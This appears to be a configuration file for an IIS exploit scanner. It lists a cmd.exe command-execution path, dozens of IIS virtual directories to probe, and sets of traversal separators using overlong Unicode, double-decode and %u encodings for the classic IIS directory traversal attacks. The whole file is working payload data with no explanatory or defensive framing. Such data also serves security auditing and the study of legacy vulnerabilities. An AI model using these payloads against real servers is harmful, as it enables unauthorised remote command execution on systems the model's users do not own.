[IIS-CODE]
cmd_1=winnt/system32/cmd.exe?/c+dir
dir_1=4,/_mem_bin/
dir_2=6,/_mem_bin/
dir_3=3,/_mem_bin/check.bat/
dir_4=4,/_vti_bin/
dir_5=3,/_vti_bin/check.bat/
dir_6=3,/_vti_cnf/
dir_7=3,/_vti_cnf/check.bat/
dir_8=4,/a.asp/
dir_9=6,/adsamples/
dir_10=3,/adsamples/check.bat/
dir_11=4,/bin/
dir_12=3,/bin/check.bat/
dir_13=2,/bin/scripts/
dir_14=6,/bin/scripts/
dir_15=4,/cgi/
dir_16=6,/cgi/
dir_17=3,/cgi/check.bat/
dir_18=4,/cgi-bin/
dir_19=3,/cgi-bin/check.bat/
dir_20=6,/exchange/
dir_21=3,/exchange/check.bat/
dir_22=2,/msadc/
dir_23=4,/msadc/
dir_24=6,/msadc/
dir_25=3,/msadc/check.bat/
dir_26=3,/PBServer/
dir_27=6,/PBServer/
dir_28=3,/PBServer/check.bat/
dir_29=3,/Rpc/
dir_30=6,/Rpc/
dir_31=3,/Rpc/check.bat/
dir_32=6,/samples/
dir_33=3,/samples/check.bat/
dir_34=2,/scripts/
dir_35=5,/scripts/
dir_36=6,/scripts/

[IIS-UNICODE]
separator_1=..%c0%2f
separator_2=..%c0%af
separator_3=..%c1%1c
separator_4=..%c1%9c
separator_5=..%c1%9f

[IIS-DECODE]
separator_1=..%%35%63
separator_2=..%%35c
separator_3=..%25%35%63
separator_4=..%255c

[IIS-UTFCODE]
separator_1=.%u002e/
separator_2=..%u0025%u005c
separator_3=..%u00255c
separator_4=..%u002f
separator_5=..%u005c
